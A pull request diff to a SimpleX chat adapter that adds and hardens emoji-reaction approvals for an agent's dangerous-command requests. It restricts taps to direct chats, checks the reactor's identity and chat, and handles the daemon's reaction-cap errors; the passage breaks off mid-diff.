### PR TITLE
feat(simplex): reaction-based exec approvals

### DIFF
--- a/plugins/platforms/simplex/adapter.py
+++ b/plugins/platforms/simplex/adapter.py
@@ -82,11 +82,19 @@ HEALTH_CHECK_STALE_THRESHOLD = 300.0
 # Correlation ID prefix for requests we send so we can ignore our own echoes.
 _CORR_PREFIX = "hermes-"
 
-# How long a reaction-based approval prompt stays tappable, in seconds.
-# Deliberately equal to the ``approvals.timeout`` default in
-# ``tools/approval.py`` — the two timers are independent, and a prompt that
-# outlives the agent-side wait would collect taps that resolve nothing.
-APPROVAL_PROMPT_TTL_SECONDS = 300.0
+# Fallback tap-window for an approval prompt, used only when the core
+# approval config cannot be read. The live value comes from
+# ``tools.approval._get_approval_timeout()`` — the two timers are
+# independent, and a prompt that outlives the agent-side wait would collect
+# taps that resolve nothing, so the adapter follows the operator's
+# ``approvals.timeout`` instead of hardcoding its own.
+APPROVAL_PROMPT_TTL_FALLBACK_SECONDS = 300.0
+
+# Correlated-wait budget for the anchoring ``/_send``. gateway/run.py gives
+# ``send_exec_approval`` 15 seconds before it abandons the button lane and
+# posts its own plain-text prompt, so waiting the full 15 here leaves no
+# headroom and a slow daemon double-posts the approval.
+ANCHORED_SEND_TIMEOUT_SECONDS = 10.0
 
 # Reaction vocabulary for dangerous-command approvals: (emoji, choice, label).
 # Legend text and the pre-seeded emoji are both generated from this tuple so
@@ -136,9 +144,19 @@ def _normalize_reaction_emoji(emoji: str) -> str:
     return out
 
 
-def _env_flag(name: str) -> bool:
-    """True when an env var is set to a truthy string."""
-    return os.getenv(name, "").strip().lower() in {"true", "1", "yes"}
+def _approval_prompt_ttl() -> float:
+    """Seconds a reaction prompt stays tappable — the operator's own value.
+
+    Reads ``approvals.timeout`` through ``tools.approval``. Lazy import for
+    the same reason the resolve call is lazy: the plugin must load without
+    the agent package present.
+    """
+    try:
+        from tools.approval import _get_approval_timeout
+
+        return float(_get_approval_timeout())
+    except Exception:
+        return APPROVAL_PROMPT_TTL_FALLBACK_SECONDS
 
 
 def _parse_comma_list(value: str) -> List[str]:
@@ -198,7 +216,10 @@ class _SimplexApprovalPrompt:
     chat_id: str
     chat_ref: str
     item_id: str
-    requester_user_id: Optional[str] = None
+    # Tiers this particular prompt offered. A reaction for a tier that was
+    # never on the table is refused rather than silently upgraded — the
+    # emoji→choice map is global, the offer is not.
+    choices: frozenset = field(default_factory=frozenset)
     expires_at: float = 0.0
     resolved: bool = False
     # Emoji the bot actually placed, so cleanup removes only its own.
@@ -280,6 +301,12 @@ class SimplexAdapter(BasePlatformAdapter):
         # is what an inbound reaction event points back at.
         self._approval_prompts_by_item: Dict[str, _SimplexApprovalPrompt] = {}
         self._approval_prompt_by_session: Dict[str, str] = {}
+        # Sessions that piled up more than one approval, and the moment the
+        # pile-up can be assumed drained. Answering a prompt by typing is
+        # invisible to this adapter, so once a session's queue holds more
+        # than one entry the only safe assumption is that it still does,
+        # until the whole approval window lapses.
+        self._typed_only_sessions: Dict[str, float] = {}
         # Tri-state feature detection for daemon reaction support: None until
         # the first /_reaction is answered, then True/False. Never assumed —
         # older daemons and future emoji-policy changes both show up as an
@@ -378,6 +405,7 @@ class SimplexAdapter(BasePlatformAdapter):
         self._background_tasks.clear()
         self._approval_prompts_by_item.clear()
         self._approval_prompt_by_session.clear()
+        self._typed_only_sessions.clear()
 
         if hasattr(self, "_mark_disconnected"):
             self._mark_disconnected()
@@ -406,6 +434,11 @@ class SimplexAdapter(BasePlatformAdapter):
                     self._ws = ws
                     backoff = WS_RETRY_DELAY_INITIAL
                     self._last_ws_activity = time.time()
+                    # A fresh connection may be a fresh (or upgraded) daemon,
+                    # so re-probe reaction support instead of carrying a
+                    # single earlier command error forward for the life of
+                    # the process.
+                    self._reactions_supported = None
                     logger.info("SimpleX WS: connected")
 
                     async for raw in ws:
@@ -1057,8 +1090,13 @@ class SimplexAdapter(BasePlatformAdapter):
             return None
         if chat_id.startswith("group:"):
             group_id = chat_id[6:]
-            return f"#{group_id}" if group_id else None
+            return f"#{group_id}" if group_id.isdigit() else None
         return f"@{chat_id}" if chat_id.isdigit() else None
+
+    @staticmethod
+    def _is_group_chat(chat_id: str) -> bool:
+        """True for a group chat id (``group:<id>``), False for a DM."""
+        return str(chat_id or "").startswith("group:")
 
     async def _send_anchored_text(self, chat_ref: str, text: str) -> Tuple[Optional[str], bool]:
         """Send text via ``/_send`` and return ``(item_id, delivered)``.
@@ -1067,13 +1105,23 @@ class SimplexAdapter(BasePlatformAdapter):
         reply, because a reaction has to be anchored to the daemon's
         ``itemId`` for the message it decorates.
 
-        ``delivered`` is False only when the daemon answered with an explicit
-        error. A timeout leaves the message *possibly* delivered, so the
-        caller must report success and skip the reactions rather than resend
-        and double-post an approval prompt.
+        ``delivered`` is False when the send was never attempted (no live
+        WebSocket) or when the daemon answered with an explicit error — both
+        cases mean the user will see nothing, so the caller must fail and let
+        ``gateway/run.py`` post its own plain-text prompt. A *timeout* is
+        different: the message is possibly delivered, so the caller reports
+        success and skips the reactions rather than double-posting.
         """
+        if not self._ws:
+            logger.warning(
+                "SimpleX: approval prompt not sent — WebSocket not connected"
+            )
+            return None, False
         composed = json.dumps([{"msgContent": {"type": "text", "text": text}}])
-        resp = await self._send_command(f"/_send {chat_ref} json {composed}", timeout=15.0)
+        resp = await self._send_command(
+            f"/_send {chat_ref} json {composed}",
+            timeout=ANCHORED_SEND_TIMEOUT_SECONDS,
+        )
         if resp is None:
             return None, True
         if resp.get("type") == "chatCmdError":
@@ -1143,8 +1191,15 @@ class SimplexAdapter(BasePlatformAdapter):
         description: str,
         smart_denied: bool,
         choices: Tuple[Tuple[str, str, str], ...],
+        *,
+        show_legend: bool,
     ) -> str:
-        """Compose the approval prompt: shared core, typed commands, legend."""
+        """Compose the approval prompt: shared core, typed commands, legend.
+
+        *choices* is always the full set of tiers this approval offers — the
+        typed instructions must list them whether or not a tap lane exists.
+        *show_legend* is what adds the reaction legend on top.
+        """
         prefix = self.typed_command_prefix
         offered = {choice for _emoji, choice, _label in choices}
         scope = ""
@@ -1161,7 +1216,7 @@ class SimplexAdapter(BasePlatformAdapter):
             f"{scope}Reply `{prefix}approve` to execute once, or "
             f"`{prefix}deny` to cancel."
         )
-        if choices:
+        if show_legend and choices:
             legend = "\n".join(
                 f"{emoji} = {label}" for emoji, _choice, label in choices
             )
@@ -1179,25 +1234,64 @@ class SimplexAdapter(BasePlatformAdapter):
         allow_session: bool = True,
         smart_denied: bool = False,
     ) -> SendResult:
-        """Send a reaction-based exec approval prompt for SimpleX.
+        """Send an exec approval prompt, with a tap lane when it is unambiguous.
 
         Mirrors the Matrix adapter: one ordinary chat message carrying the
         shared approval text, with the bot pre-seeding the decision emoji so
         answering is a tap instead of a retyped command. The typed
-        ``/approve`` / ``/deny`` instructions stay in the message either way,
-        so a daemon that rejects reactions still leaves a working flow.
+        ``/approve`` / ``/deny`` instructions stay in the message on every
+        path, so every fallback below still leaves a working flow.
+
+        The tap lane is offered only when a tap can mean exactly one thing:
+        a direct chat with exactly one live approval. Groups and concurrent
+        approvals fall back to the typed lane — see the guards below.
 
         *command* arrives already credential-redacted from ``gateway/run.py``
         — do not re-redact it and do not log it.
         """
         choices = self._approval_choices(allow_permanent, allow_session, smart_denied)
+
+        # Housekeeping first, and before any early return: prompts nobody
+        # ever answered would otherwise accumulate for the life of the
+        # gateway and make the single-pending check below lie.
+        self._sweep_expired_prompts()
+
+        # resolve_gateway_approval(session_key, choice) is FIFO per session
+        # (upstream #64001) — a tap cannot target a specific queue entry, so
+        # a second live prompt in one session would let a tap on either
+        # message answer the older command. Withdraw the older prompt and
+        # send this one typed-only rather than offer an ambiguous tap.
+        #
+        # The session then stays typed-only for a full approval window: a
+        # third prompt would find an empty prompt map while two unanswered
+        # commands are still queued in core, and a tap on it would run the
+        # oldest of them.
+        now = time.monotonic()
+        if self._retire_live_prompt_for_session(session_key) or (
+            self._typed_only_sessions.get(session_key, 0.0) > now
+        ):
+            self._typed_only_sessions[session_key] = now + _approval_prompt_ttl()
+            queued = True
+        else:
+            queued = False
+
         chat_ref = self._chat_ref(chat_id)
-        use_reactions = bool(chat_ref) and self._reactions_supported is not False
+        # v1 keeps the reaction lane to direct chats. In a group, any member
+        # can react, and the only identity the daemon hands us for a group
+        # reactor is one this adapter cannot yet tie to a verified operator.
+        # Groups get the typed lane, which the gateway authorizes properly.
+        reaction_lane = (
+            bool(chat_ref) and not self._is_group_chat(chat_id) and not queued
+        )
+        # Seeding is a separate capability from the inbound lane: a daemon
+        # that refuses to let the bot place a reaction has not said anything
+        # about reactions a *user* places.
+        seed = reaction_lane and self._reactions_supported is not False
 
         text = self._format_simplex_exec_approval(
-            command, description, smart_denied, choices if use_reactions else ()
+            command, description, smart_denied, choices, show_legend=seed
         )
-        if not use_reactions:
+        if not reaction_lane:
             return await self.send(chat_id, text, metadata=metadata)
 
         item_id, delivered = await self._send_anchored_text(str(chat_ref), text)
@@ -1215,22 +1309,51 @@ class SimplexAdapter(BasePlatformAdapter):
             chat_id=chat_id,
             chat_ref=str(chat_ref),
             item_id=item_id,
-            requester_user_id=str((metadata or {}).get("requester_user_id") or "")
-            or None,
-            expires_at=time.monotonic() + APPROVAL_PROMPT_TTL_SECONDS,
+            choices=frozenset(choice for _emoji, choice, _label in choices),
+            expires_at=time.monotonic() + _approval_prompt_ttl(),
         )
-        stale_item = self._approval_prompt_by_session.get(session_key)
-        if stale_item:
-            self._approval_prompts_by_item.pop(stale_item, None)
         self._approval_prompts_by_item[item_id] = prompt
         self._approval_prompt_by_session[session_key] = item_id
 
-        # Seed detached: every /_reaction waits on a correlated daemon reply,
-        # and gateway/run.py only allows send_exec_approval 15 seconds before
-        # it abandons the button lane. Prompt state is already registered, so
-        # a reaction that beats the seeding still correlates.
-        self._spawn_background(self._seed_approval_reactions(prompt, choices))
+        if seed:
+            # Seed detached: every /_reaction waits on a correlated daemon
+            # reply, and gateway/run.py only allows send_exec_approval 15
+            # seconds before it abandons the button lane. Prompt state is
+            # already registered, so a reaction that beats the seeding still
+            # correlates.
+            self._spawn_background(self._seed_approval_reactions(prompt, choices))
         return SendResult(success=True, message_id=item_id)
+
+    def _sweep_expired_prompts(self) -> None:
+        """Retire every prompt whose tap window has closed."""
+        now = time.monotonic()
+        for prompt in list(self._approval_prompts_by_item.values()):
+            if now > prompt.expires_at:
+                self._retire_prompt(prompt)
+        for session_key, deadline in list(self._typed_only_sessions.items()):
+            if now > deadline:
+                self._typed_only_sessions.pop(session_key, None)
+
+    def _retire_live_prompt_for_session(self, session_key: str) -> bool:
+        """Withdraw the session's live prompt, if any. True when one was live.
+
+        Tells the user what happened: the message they are looking at now has
+        no working tap targets, and the reason is not obvious from the chat.
+        """
+        item_id = self._approval_prompt_by_session.get(session_key)
+        live = self._approval_prompts_by_item.get(item_id) if item_id else None
+        if live is None or live.resolved:
+            return False
+        prefix = self.typed_command_prefix
+        self._retire_prompt(
+            live,
+            notice=(
+                "A newer approval request superseded this one. Reactions on "
+                f"the message above no longer do anything — reply "
+                f"`{prefix}approve` or `{prefix}deny` to answer."
+            ),
+        )
+        return True
 
     async def _seed_approval_reactions(
         self,
@@ -1238,7 +1361,7 @@ class SimplexAdapter(BasePlatformAdapter):
         choices: Tuple[Tuple[str, str, str], ...],
     ) -> None:
         """Pre-seed the decision emoji so the user taps instead of types."""
-        for emoji, _choice, _label in choices:
+        for index, (emoji, _choice, _label) in enumerate(choices):
             if prompt.resolved:
                 return
             accepted = await self._set_reaction(
@@ -1246,28 +1369,51 @@ class SimplexAdapter(BasePlatformAdapter):
             )
             if accepted:
                 self._reactions_supported = True
+                if prompt.resolved:
+                    # Cleanup ran while this seed was in flight: take our own
+                    # late reaction back off instead of stranding it on a
+                    # resolved prompt as a live-looking tap target.
+                    await self._set_reaction(
+                        prompt.chat_ref, prompt.item_id, emoji, add=False
+                    )
+                    return
                 prompt.seeded_emoji.append(emoji)
-            elif accepted is False:
+            elif accepted is False and index == 0:
+                # The first emoji is ✅, which the daemon's own validator
+                # allows, so rejecting it means reactions are refused
+                # wholesale. A rejection further down the list is about that
+                # one emoji and must not disable the whole lane.
                 await self._downgrade_to_typed_approvals(prompt)
                 return
+            elif accepted is False:
+                logger.info(
+                    "SimpleX: daemon refused approval emoji %s — "
+                    "the remaining tap targets still stand",
+                    emoji,
+                )
 
     async def _downgrade_to_typed_approvals(
         self, prompt: _SimplexApprovalPrompt
     ) -> None:
-        """Record that this daemon refuses reactions and say so once."""
+        """Record that this daemon refuses to let the bot place reactions.
+
+        This disables *seeding* and the legend, not the inbound lane: a user
+        who places one of the approval emoji themselves still resolves the
+        prompt. Says so once per downgrade.
+        """
         if self._reactions_supported is False:
             return
         self._reactions_supported = False
         logger.warning(
-            "SimpleX: daemon does not accept approval reactions — "
-            "falling back to typed %sapprove for the rest of this run",
+            "SimpleX: daemon does not accept reactions from this bot — "
+            "prompts will not be pre-seeded; typed %sapprove still works",
             self.typed_command_prefix,
         )
         prefix = self.typed_command_prefix
         await self.send(
             prompt.chat_id,
-            "This SimpleX daemon does not accept approval reactions. Reply "
-            f"`{prefix}approve` or `{prefix}deny` instead.",
+            "This SimpleX daemon does not let me place the approval "
+            f"reactions. Reply `{prefix}approve` or `{prefix}deny` instead.",
         )
 
     async def _clear_seeded_reactions(self, prompt: _SimplexApprovalPrompt) -> None:
@@ -1276,18 +1422,45 @@ class SimplexAdapter(BasePlatformAdapter):
         SimpleX reactions are toggles keyed by emoji rather than addressable
         events, so cleanup is the same command with ``off`` — there is no
         redaction step and nothing to schedule around delivery lag.
+
+        Emoji come off the list as they are toggled, not from a snapshot: the
+        seeder may still be appending while this runs.
         """
-        for emoji in list(prompt.seeded_emoji):
+        while prompt.seeded_emoji:
+            emoji = prompt.seeded_emoji.pop(0)
             await self._set_reaction(
                 prompt.chat_ref, prompt.item_id, emoji, add=False
             )
-        prompt.seeded_emoji.clear()
+
+    @staticmethod
+    def _event_chat_id(wrapper: dict) -> str:
+        """Chat the reaction event happened in, in adapter chat-id form.
+
+        Matrix compares the reaction's room against the prompt's room before
+        it authorizes anything (``plugins/platforms/matrix/adapter.py``); this
+        is the SimpleX equivalent, and it is what turns "a DM reactor is the
+        DM owner" from an assumption into a checked invariant.
+        """
+        chat_info = wrapper.get("chatInfo") or {}
+        if not isinstance(chat_info, dict):
+            return ""
+        info_type = chat_info.get("type")
+        if info_type == "direct":
+            contact = chat_info.get("contact") or {}
+            if isinstance(contact, dict):
+                return str(contact.get("contactId", "") or "")
+            return ""
+        if info_type == "group":
+            group = chat_info.get("groupInfo") or {}
+            if isinstance(group, dict) and group.get("groupId") is not None:
+                return f"group:{group.get('groupId')}"
+        return ""
 
     @staticmethod
     def _reaction_sender(wrapper: dict, chat_reaction: dict) -> Tuple[str, str]:
         """Return ``(user_id, display_name)`` for whoever placed a reaction."""
         chat_dir = chat_reaction.get("chatDir") or {}
-        member = chat_dir.get("groupMember") or {}
+        member = chat_dir.get("groupMember") or {} if isinstance(chat_dir, dict) else {}
         if isinstance(member, dict) and member:
             return (
                 str(member.get("memberId", "") or ""),
@@ -1305,36 +1478,29 @@ class SimplexAdapter(BasePlatformAdapter):
         self,
         prompt: _SimplexApprovalPrompt,
         user_id: str,
-        display_name: str,
+        chat_reaction: dict,
     ) -> bool:
         """Fail-closed check that this reactor may answer this prompt.
 
-        Direct chats need no allowlist lookup: the only party who can react
-        in a DM is the contact that owns it, and that contact is the one
-        whose message raised the approval — so identity is the chat id. This
-        keeps DM-paired users (``hermes pairing approve simplex``) working
-        without duplicating the gateway's authorization rules in the plugin.
-
-        Groups are different — any member can react — so a group reactor must
-        appear in ``SIMPLEX_ALLOWED_USERS``. An empty allowlist denies, which
-        leaves the typed ``/approve`` path (fully authorized by the gateway)
-        as the way in.
+        The reaction lane is direct-chat only, and that is the whole of the
+        authorization model: the only party who can react in a DM is the
+        contact that owns it, and that contact is the one whose message
+        raised the approval — so identity is the chat id. Nothing is read
+        from an allowlist env var, and no allow-all flag can widen it;
+        ``SIMPLEX_ALLOW_ALL_USERS`` governs who may *talk* to the bot, never
+        who may approve a dangerous command. DM-paired users
+        (``hermes pairing approve simplex``) keep working with no extra
+        configuration, and the typed ``/approve`` path — fully authorized by
+        the gateway — remains the way in for everyone else.
         """
-        identities = {i for i in (user_id, display_name) if i}
-        if _env_flag("SIMPLEX_ALLOW_ALL_USERS") or _env_flag("GATEWAY_ALLOW_ALL_USERS"):
-            authorized = True
-        elif prompt.chat_id.startswith("group:"):
-            allowlist = set(_parse_comma_list(os.getenv("SIMPLEX_ALLOWED_USERS", "")))
-            authorized = bool(allowlist & identities)
-        else:
-            authorized = prompt.chat_id in identities
-        if not authorized:
+        if self._is_group_chat(prompt.chat_id):
             return False
-
-        # Requester binding, when the gateway threads it through: only the
-        # user who triggered the command may answer for it.
-        requester = prompt.requester_user_id
-        return not (requester and user_id and user_id != requester)
+        chat_dir = chat_reaction.get("chatDir") or {}
+        if isinstance(chat_dir, dict) and chat_dir.get("groupMember"):
+            # A group member reacting on something registered as a DM: the
+            # identity namespaces do not match, so refuse rather than guess.
+            return False
+        return bool(user_id) and user_id == prompt.chat_id
 
     async def _reaction_feedback(
         self, prompt: _SimplexApprovalPrompt, text: str
@@ -1347,20 +1513,32 @@ class SimplexAdapter(BasePlatformAdapter):
 
     async def _expire_approval_prompt(self, prompt: _SimplexApprovalPrompt) -> None:
         """Retire a prompt whose tap window closed."""
-        self._retire_approval_prompt(prompt)
+        self._retire_prompt(prompt)
         await self.send(
             prompt.chat_id,
             "This approval prompt has expired. Run the command again if you "
             "still want to approve it.",
         )
 
-    def _retire_approval_prompt(self, prompt: _SimplexApprovalPrompt) -> None:
-        """Mark a prompt done, drop its correlation state, clear the seeds."""
+    def _retire_prompt(
+        self, prompt: _SimplexApprovalPrompt, *, notice: Optional[str] = None
+    ) -> None:
+        """Retire a prompt: no live tap targets, no correlation state left.
+
+        The single retirement path. Marking ``resolved`` is what stops a
+        later tap and what tells an in-flight seeder to take its own late
+        reaction back off; clearing the seeds is what stops the message from
+        *looking* answerable. Skipping either one leaves a message with four
+        live-looking buttons that resolve something else.
+        """
         prompt.resolved = True
         self._approval_prompts_by_item.pop(prompt.item_id, None)
-        self._approval_prompt_by_session.pop(prompt.session_key, None)
+        if self._approval_prompt_by_session.get(prompt.session_key) == prompt.item_id:
+            self._approval_prompt_by_session.pop(prompt.session_key, None)
         if prompt.seeded_emoji:
             self._spawn_background(self._clear_seeded_reactions(prompt))
+        if notice:
+            self._spawn_background(self.send(prompt.chat_id, notice))
 
     async def _handle_reaction_event(self, resp: dict) -> None:
         """Resolve a pending exec approval from a ``chatItemReaction`` event.
@@ -1375,8 +1553,10 @@ class SimplexAdapter(BasePlatformAdapter):
             return  # un-reacting never answers a prompt
 
         wrapper = resp.get("reaction") or {}
+        if not isinstance(wrapper, dict):
+            return
         chat_reaction = wrapper.get("chatReaction") or {}
-        if not isinstance(wrapper, dict) or not isinstance(chat_reaction, dict):
+        if not isinstance(chat_reaction, dict):
             return
 
         chat_dir = chat_reaction.get("chatDir") or {}
@@ -1396,18 +1576,40 @@ class SimplexAdapter(BasePlatformAdapter):
         if prompt is None or prompt.resolved:
             return
 
-        if time.monotonic() > prompt.expires_at:
-            await self._expire_approval_prompt(prompt)
+        # Currency: this must still be the session's one live prompt. The
+        # guard in send_exec_approval already retires anything older, so this
+        # should be unreachable — it stays because it is the invariant the
+        # whole design rests on, and it costs one dict lookup.
+        if self._approval_prompt_by_session.get(prompt.session_key) != prompt.item_id:
+            self._retire_prompt(prompt)
+            await self.send(
+                prompt.chat_id,
+                "That approval is no longer pending — a newer request "
+                "replaced it. The command did not run.",
+            )
             return
 
-        user_id, display_name = self._reaction_sender(wrapper, chat_reaction)
-        if not self._reactor_authorized(prompt, user_id, display_name):
-            # Logged, not answered: an unauthorized reactor in a busy group
-            # would otherwise get the bot to post on demand.
+        # Same chat the prompt was posted in, or nothing doing.
+        if self._event_chat_id(wrapper) != prompt.chat_id:
+            logger.info(
+                "SimpleX: ignoring approval reaction from a different chat"
+            )
+            return
+
+        user_id, _display_name = self._reaction_sender(wrapper, chat_reaction)
+        if not self._reactor_authorized(prompt, user_id, chat_reaction):
+            # Logged, not answered: an unauthorized reactor would otherwise
+            # get the bot to post on demand.
             logger.info(
                 "SimpleX: ignoring approval reaction from unauthorized user %s",
                 _redact_id(user_id),
             )
+            return
+
+        # Expiry after authorization: an unauthorized party must not be able
+        # to make the bot post the expiry notice on demand.
+        if time.monotonic() > prompt.expires_at:
+            await self._expire_approval_prompt(prompt)
             return
 
         msg_reaction = chat_reaction.get("reaction") or {}
@@ -1415,7 +1617,10 @@ class SimplexAdapter(BasePlatformAdapter):
             msg_reaction.get("emoji", "") if isinstance(msg_reaction, dict) else ""
         )
         choice = _APPROVAL_REACTION_MAP.get(emoji)
-        if not choice:
+        if not choice or choice not in prompt.choices:
+            # Either not an approval emoji at all, or a tier this prompt
+            # deliberately did not offer — approve-always on a smart-denied
+            # command, say. Never silently widen the offer.
             await self._reaction_feedback(
                 prompt, "That reaction is not one of the approval options."
             )
@@ -1431,7 +1636,7 @@ class SimplexAdapter(BasePlatformAdapter):
             )
             return
 
-        self._retire_approval_prompt(prompt)
+        self._retire_prompt(prompt)
         if not count:
             # Nothing was pending: a typed /approve, an interrupt, or the
             # agent-side timeout already drained the queue. Say so — silently

--- a/plugins/platforms/simplex/adapter.py
+++ b/plugins/platforms/simplex/adapter.py
@@ -1506,15 +1506,16 @@ class SimplexAdapter(BasePlatformAdapter):
         no-longer-pending and unusable-reaction replies — goes out through
         here rather than through :meth:`send`.
 
-        :meth:`send` composes a DM as ``@<chat_id> <text>``, and the daemon
-        parses ``@x`` as a *display-name* lookup: on any contact whose
-        display name is not literally its numeric id it answers
-        ``contactNotFound`` and nothing reaches the chat, while the send
-        still reports success. (Verified against simplex-chat v7.0.0.11:
-        ``@3 hi`` → ``chatCmdError/contactNotFound``, the structured form →
-        ``newChatItems``. The media paths already use the structured form;
-        only DM text is affected. That is a separate bug in ``send`` and is
-        not fixed here.) A user who taps ✅ and sees no reply reads the tap
+        Historical note: when this flow was built, :meth:`send` composed a
+        DM as ``@<chat_id> <text>``, which the daemon parses as a
+        *display-name* lookup — silently dropping the message for any
+        contact whose display name is not literally its numeric id
+        (verified against simplex-chat v7.0.0.11: ``@3 hi`` →
+        ``chatCmdError/contactNotFound``). :meth:`send` has since moved to
+        the structured form on main, so both paths now address by id; this
+        helper remains as the approval flow's self-contained send path and
+        the home of the display-name fallback below. A user who taps ✅
+        and sees no reply reads the tap
         as broken, so the approval flow must not depend on that branch.
 
         Chats with no numeric ``ChatRef`` — DMs addressed by display name —

--- a/plugins/platforms/simplex/adapter.py
+++ b/plugins/platforms/simplex/adapter.py
@@ -96,27 +96,53 @@ APPROVAL_PROMPT_TTL_FALLBACK_SECONDS = 300.0
 # headroom and a slow daemon double-posts the approval.
 ANCHORED_SEND_TIMEOUT_SECONDS = 10.0
 
-# Reaction vocabulary for dangerous-command approvals: (emoji, choice, label).
-# Legend text and the pre-seeded emoji are both generated from this tuple so
-# the bot can never advertise a reaction it does not seed.
+# Tap targets the bot places on its own approval prompt, in seeding order:
+# (emoji, choice, label).
+#
+# Exactly three, because simplex-chat holds at most three reactions per
+# sender per item — measured against v7.0.0.11, where seeding a fourth comes
+# back as ``commandError: "too many reactions"``. It is a count cap, not an
+# emoji filter (removing one frees a slot), and it is per *sender*, so a user
+# can always still add their own reaction to an item the bot has filled.
+#
+# Deny is first on purpose: whichever target is seeded last is the one a cap
+# drops, and "I refuse" is the choice a security prompt must never lose.
 #
 # The emoji are NOT the Matrix adapter's ✅/🌀/♾️/❌ set. The simplex-chat
 # daemon validates reaction emoji against a fixed list (``mrEmojiChar`` in
 # ``src/Simplex/Chat/Protocol.hs`` accepts only 👍👎😀😂😢❤🚀✅ and rejects
 # everything else), so 🌀/♾️/❌ would come back as command errors.
 _APPROVAL_CHOICES: Tuple[Tuple[str, str, str], ...] = (
+    ("👎", "deny", "deny"),
     ("✅", "once", "approve once"),
     ("🚀", "session", "approve for this session"),
-    ("❤", "always", "approve always"),
-    ("👎", "deny", "deny"),
 )
 
 _APPROVAL_REACTION_MAP: Dict[str, str] = {
     emoji: choice for emoji, choice, _label in _APPROVAL_CHOICES
 }
-# 👍 is not seeded (it would crowd the legend) but it is what people reach for
-# first, and the gateway already reads a typed 👍 as approval.
+# 👍 is not seeded but it is what people reach for first, and the gateway
+# already reads a typed 👍 as approval.
 _APPROVAL_REACTION_MAP["👍"] = "once"
+# ❤ is approve-*always*, and it is deliberately typed-only: it writes a
+# permanent, global, on-disk allowlist entry, which is the most consequential
+# thing this prompt can do. A deliberate ``/approve always`` is the right cost
+# for that tier, and it keeps the three tap slots for the tiers that are
+# scoped to the moment. Still honoured inbound, so a user who places ❤ by hand
+# gets what they asked for.
+_APPROVAL_REACTION_MAP["❤"] = "always"
+
+# Outcomes of asking the daemon to place or remove one of our reactions.
+_REACTION_ACCEPTED = "accepted"
+_REACTION_REJECTED = "rejected"
+_REACTION_CAPPED = "capped"
+_REACTION_NO_ANSWER = "no-answer"
+
+# What the daemon says when a sender already holds its maximum reactions on
+# an item. Matched on the message text rather than a decoded error shape
+# because the error envelope varies between daemon versions, and mistaking a
+# cap for a refusal would drop the whole reaction lane.
+_REACTION_CAP_MARKER = "too many reactions"
 
 _APPROVAL_ACK: Dict[str, str] = {
     "once": "✅ Approved — running this once.",
@@ -142,6 +168,21 @@ def _normalize_reaction_emoji(emoji: str) -> str:
     for selector in _VARIATION_SELECTORS:
         out = out.replace(selector, "")
     return out
+
+
+def _is_reaction_cap_error(resp: dict) -> bool:
+    """True when a ``chatCmdError`` is the daemon's per-sender reaction cap.
+
+    "You already hold three reactions here" and "this daemon refuses your
+    reactions" arrive as the same response type and mean opposite things —
+    one is a full slot, the other is the feature being unavailable — so they
+    must not share an outcome.
+    """
+    try:
+        blob = json.dumps(resp.get("chatError") or resp, ensure_ascii=False)
+    except (TypeError, ValueError):
+        blob = str(resp)
+    return _REACTION_CAP_MARKER in blob.lower()
 
 
 def _approval_prompt_ttl() -> float:
@@ -1188,13 +1229,15 @@ class SimplexAdapter(BasePlatformAdapter):
         emoji: str,
         *,
         add: bool = True,
-    ) -> Optional[bool]:
+    ) -> str:
         """Add or remove one of the bot's own reactions on a chat item.
 
-        Returns True when the daemon accepted the reaction, False when it
-        answered with an explicit command error (the feature-detection
-        signal), and None when nothing came back — inconclusive, and
-        deliberately not treated as "reactions unsupported".
+        Returns one of :data:`_REACTION_ACCEPTED`, :data:`_REACTION_CAPPED`
+        (the sender already holds the daemon's maximum on this item),
+        :data:`_REACTION_REJECTED` (an explicit command error — the
+        feature-detection signal) or :data:`_REACTION_NO_ANSWER` (nothing
+        came back: inconclusive, and deliberately not read as "reactions
+        unsupported").
         """
         reaction = json.dumps({"type": "emoji", "emoji": emoji}, ensure_ascii=False)
         toggle = "on" if add else "off"
@@ -1202,71 +1245,81 @@ class SimplexAdapter(BasePlatformAdapter):
             f"/_reaction {chat_ref} {item_id} {toggle} {reaction}", timeout=10.0
         )
         if resp is None:
-            return None
+            return _REACTION_NO_ANSWER
         if resp.get("type") == "chatCmdError":
+            if _is_reaction_cap_error(resp):
+                return _REACTION_CAPPED
             logger.info(
                 "SimpleX: daemon rejected reaction %s on item %s", emoji, item_id
             )
-            return False
-        return True
+            return _REACTION_REJECTED
+        return _REACTION_ACCEPTED
 
     @staticmethod
-    def _approval_choices(
+    def _approval_tiers(
         allow_permanent: bool,
         allow_session: bool,
         smart_denied: bool,
-    ) -> Tuple[Tuple[str, str, str], ...]:
-        """Select the reaction tiers this particular approval actually offers.
+    ) -> frozenset:
+        """The approval tiers this particular request actually offers.
 
         A smart-DENY owner override is one operation only — ``tools/approval``
         collapses any wider choice back to a single run — so the prompt must
         not offer session or permanent scope for it.
         """
         if smart_denied or not allow_session:
-            offered = {"once", "deny"}
-        elif not allow_permanent:
-            offered = {"once", "session", "deny"}
-        else:
-            offered = {"once", "session", "always", "deny"}
-        return tuple(c for c in _APPROVAL_CHOICES if c[1] in offered)
+            return frozenset({"once", "deny"})
+        if not allow_permanent:
+            return frozenset({"once", "session", "deny"})
+        return frozenset({"once", "session", "always", "deny"})
+
+    @staticmethod
+    def _seed_plan(tiers: frozenset) -> Tuple[Tuple[str, str, str], ...]:
+        """Tap targets to place, in order, for an approval offering *tiers*.
+
+        Always a subset of the three seedable choices: ``always`` has no tap
+        target at all, so an approval that offers it still seeds three.
+        """
+        return tuple(c for c in _APPROVAL_CHOICES if c[1] in tiers)
 
     def _format_simplex_exec_approval(
         self,
         command: str,
         description: str,
         smart_denied: bool,
-        choices: Tuple[Tuple[str, str, str], ...],
-        *,
-        show_legend: bool,
+        tiers: frozenset,
     ) -> str:
-        """Compose the approval prompt: shared core, typed commands, legend.
+        """Compose the approval prompt: shared core plus the typed commands.
 
-        *choices* is always the full set of tiers this approval offers — the
-        typed instructions must list them whether or not a tap lane exists.
-        *show_legend* is what adds the reaction legend on top.
+        *tiers* is the full set this approval offers; the typed instructions
+        list every one of them on every path, because typing is the lane that
+        always works. The reaction legend is not here — it is sent afterwards
+        from the taps that were actually placed (see
+        :meth:`_seed_approval_reactions`), so the prompt cannot advertise a
+        tap the user never received.
         """
         prefix = self.typed_command_prefix
-        offered = {choice for _emoji, choice, _label in choices}
         scope = ""
         if not smart_denied:
-            if "session" in offered:
+            if "session" in tiers:
                 scope += (
                     f"Reply `{prefix}approve session` to approve this pattern "
                     "for the session, "
                 )
-            if "always" in offered:
+            if "always" in tiers:
                 scope += f"`{prefix}approve always` to approve permanently, "
-        text = (
+        return (
